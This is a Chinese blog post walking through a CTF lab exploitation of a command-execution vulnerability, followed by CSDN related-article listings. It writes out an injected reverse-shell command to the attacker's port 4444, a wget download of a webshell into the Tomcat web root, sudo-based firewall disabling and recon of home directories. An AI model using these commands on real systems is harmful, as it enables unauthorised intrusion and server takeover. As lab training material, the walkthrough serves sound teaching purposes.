16.CTF-web安全-命令执行

已于 2022-09-30 14:23:04 修改
阅读量952 收藏 1
点赞数 1
分类专栏: ctf 文章标签: web安全 安全 linux
于 2022-09-29 17:28:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woo233/article/details/127105828
版权

命令执行漏洞介绍

当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。

调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。

实验环境

攻击机:192.168.1.105
靶场机器:192.168.1.103

信息探测

扫描主机服务信息以及服务版本
–nmap -sV 靶场IP地址
在这里插入图片描述

快速扫描主机全部信息
– nmap -T4 -A -v靶场IP地址

探测敏感信息
– nikto -host http://靶场IP地址:端口

在这里插入图片描述
使用浏览器打开http://ip:port/敏感页面,查看敏感信息,找到可利用的位置;

在这里插入图片描述
会返回一些信息
在这里插入图片描述
通过此处想到命令执行漏洞

命令执行漏洞利用

查看临时缓冲目录:ls -alh /tmp/

在这里插入图片描述

查看home目录,挖掘用户信息:ls -alh /home/

在这里插入图片描述

查看具体用户的目录: ls -alh /home/用户名/  #linux每个用户在home下面都有单独的文件夹来存信息

在这里插入图片描述

查看系统信息:uname -a

在这里插入图片描述
Ubuntu上默认防火墙为UFW

利用ssh命令执行root权限命令
使用ssh用户名@localhost通过ssh登录服务器是不需要身份验证的;查看bill用户sudo命令的权限:ssh bill@localhost sudo -l
在这里插入图片描述

关闭防火墙: ssh bill@localhost sudo ufw disable
在这里插入图片描述

使用反弹shell来提升权限

攻击机启动监听netcat
nc -nlvp 4444
在这里插入图片描述
启动监听之后
靶场机器反弹shell
ssh bill@localhost sudo bash -i >& /dev/tcp/攻击机ip/4444 0>&1

在这里插入图片描述
之后该命令之后,查看监听情况在这里插入图片描述

另一种方法:

渗透测试技巧
开启python简易http服务器 python -m SimpleHTTPServer
在这里插入图片描述

利用命令执行下载木马文件
ssh bill@localhost sudo wget “http://ip:port/webshell.jsp” -O/var /lib/tomcat8/webapps/ROOT/shelL.jsp #webshell是自己提前制作的,一定要上传到网站的根目录。
在这里插入图片描述

获取Flag

一般情况下, 靶场机器的flag值是存放在服务器的根目录下,/root/目 录。
cd /root/
ls
cat flag
在这里插入图片描述

wow2ok
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctf-web网络安全课程视频.zip
10-19
1 - 代码执行命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
最全CTF Web题思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 4万+
个人向CTF Web题思路总结笔记
15.CTF-web安全提权
woo233的博客
09-29 1851
往往我们能拿下服务器的web服务只是具有低权限用户(www-data),对于内网渗透,我们需要提权到root。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。提权前提:已经拿到低权shell被入侵的机器上面有nc,python,perl等linux非常常见的工具有权限上传文件和下载文件。
2024年网安最全ctfshow-web-命令执行
最新发布
2401_84264610的博客
05-01 65
①直接执行系统命令???”);???②内敛执行??c=echo;③利用参数输入+eval?④利用参数输入+include+伪协议(不用括号、分号)?2. web30过滤了php、flag、system补充打印文件命令?c=echo%20;3. web31其他的过滤了无所谓,但过滤了.和空格①其实就是highlight_file(flag.php);的url编码,适用php7?c=(
CTF—攻防练习之HTTP—命令执行漏洞
weixin_38168760的博客
06-20 744
渗透环境: 主机:192.168.32.152 靶机:192.168.32.1 命令执行漏洞 命令执行漏洞概念:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 漏洞成因:脚本语言优...
CTF之萌新web学习(命令执行2)
bmth666的博客
03-24 1140
1命令执行无回显情况: 判断:延时,HTTP请求,DNS请求 2控制字符串长度getshell
CTFWeb-命令执行漏洞过滤的绕过姿势
道阻且长,行则将至。
04-29 1万+
文章目录前言CTF题目绕过姿势命令联合执行关键词的绕过内联执行绕过多种解法变量拼接内联执行Base64编码总结 前言 为了备战(划水)5 月份广东省的 “红帽杯” 网络安全竞赛,继续开始到 BUUCTF 平台练习 CTF 题目。在去年参加的第四届强网杯全国网络安全竞赛中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参赛WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值: 本文目的在于结合 BU
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在网络安全领域,Capture The Flag(CTF)是一种流行的竞赛形式,让参与者通过解决各种安全问题来展示和提升自己的技能。本挑战专注于Web安全,特别是利用PHP语言进行实战演练。在这个"CTF-Web-Challenge"中,你将有...
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
在"CTF-AWD-WEB"中,重点在于Web安全领域,涵盖了各种Web应用漏洞和防护技巧。 本资源"CTF-AWD-WEB"是一个包含了多个AWD模式下Web试题的仓库,这些试题可能来源于不同的CTF线下赛事。通过这些试题,学习者可以深入...
ctf-wscan-master.zip
12-08
CTF是一种网络安全竞赛,参与者通过解密、逆向工程、漏洞挖掘等方式攻防对抗,争夺虚拟"旗帜",即获取特定的信息或控制权。这个压缩包很可能是为参赛者准备的资源,包含了帮助进行Web扫描和信息收集的工具。 在...
ctf 命令执行
weixin_74427106的博客
04-01 282
什么是命令执行漏洞:命令执行漏洞就是服务器端没有对客户的一些命令进行过滤,导致客户任意拼接命令使网站进行执行;过滤了flag所以我们只要命令里不出现flag即可所以构造。这里我不知道为啥不能用一句话木马,后续知道了在补充;运行后打开源码后即可得到flag。运行之后查看源码即可得到flag。ctfshow web入门29。先分析代码发现过滤了.和空格。这里我会个一句话木马。
CTF-命令执行
Luodehahajiang的博客
07-03 1731
ctf 命令执行 命令执行函数 命令执行绕过方法
网络渗透测试实验四-CTF实践(WebDeveloper靶机渗透)
YatKTm的博客
12-06 3223
文章目录前言实验目的系统环境实验工具实验原理:1、什么是CTF1.1 CTF竞赛模式(1)解题模式(Jeopardy)(2)攻防模式(Attack-Defense)(3)混合模式(Mix)1.2 CTF各大题型简介MISC(安全杂项)PPC(编程类)CRYPTO(密码学)STEGA(隐写)PWN(溢出)WEBweb类)实验步骤和内容:目的基本思路实现过程:1、发现目标 (netdiscover),找到WebDeveloper的IP地址。2、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况,截图并说
BUUCTF之你传你马呢 [MRCTF2020]
Ran_799的博客
12-04 558
文件上传绕过的方法有很多, 试了一下发现能用.htaccess解析漏洞,我们先创建一个文件,文件名为.htaccess,内容为。还是被过滤掉了,接着修改一下MIME信息,判断是不是有MIME过滤,将请求头的Content-Type内容改为。上传成功了,确认是黑名单过滤文件后缀跟MIME,还回显了路径,那这就好办了。接着我们切到重复器那边,随便修改一下文件后缀,判断是白名单还是黑名单绕过。然后复制一下回显的地址,并将之前的连接拼起来,得到后面的url。上传该文件,抓包修改一下MIME信息。
ctf文件上传基本思路+例题
limenzzz的博客
04-12 3809
目录 简介 一句话木马 蚁剑 例题 总结思路 附言 简介 文件上传本质上就是将文件传输到服务器时没有做好检测和过滤,导致可上传恶意程序到服务器,从而获得后台权限来干点坏事。一般这个恶意脚本文件称为webshell,通过webshell我们可以查看服务器的目录结构或文件,以及来执行一些系统指令。小马和大马,简单来说,大马是多功能,危害大,体积大的木马,小马是隐蔽性强,体量小,更方便的小木马。一句话木马就属于小马,所以较易突破防护,而大马极易被过滤。 一句话木马 首先通过看一些题解和博.
命令执行漏洞(教材:从零到一 CTFer成长之路)
L2329794714的博客
03-18 5648
一、什么是命令执行漏洞 由于开发者使用一些执行命令函数其未对用户输入的数据进行安全检查时,可注入恶意命令,实现恶意命令执行命令执行一般发生在远程,故称远程命令执行RCE(Remote Command Exec或Remote Code Exec)。 以PHP的syste()函数为例: <?php $str = $_GET['name']; system("echo hello ".$str); //调用系统程序执行命令 ?> 正常输入?name=lusong,
ctf命令执行漏洞(一)
wlllllianqing的博客
10-12 2057
命令执行漏洞原理 命令执行漏洞,就是指用户通过浏览器或其他辅助程序提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,用户可以提交恶意语句并交由服务器执行。 在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。 相关函数 ...
Ctfer训练计划】——命令执行的解题技巧(持续更新中)
Demo不是emo的博客
12-31 5670
ctf命令执行题型解题方法汇总(持续更新中)
Web安全:深入解析命令注入漏洞
- **使用安全的库和框架**:选择那些内置安全防护措施的库和框架,例如限制命令执行的函数或提供安全执行命令的替代方法。 - **日志和监控**:及时记录和分析系统日志,以便早期发现异常行为。 理解并防止命令注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wow2ok

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值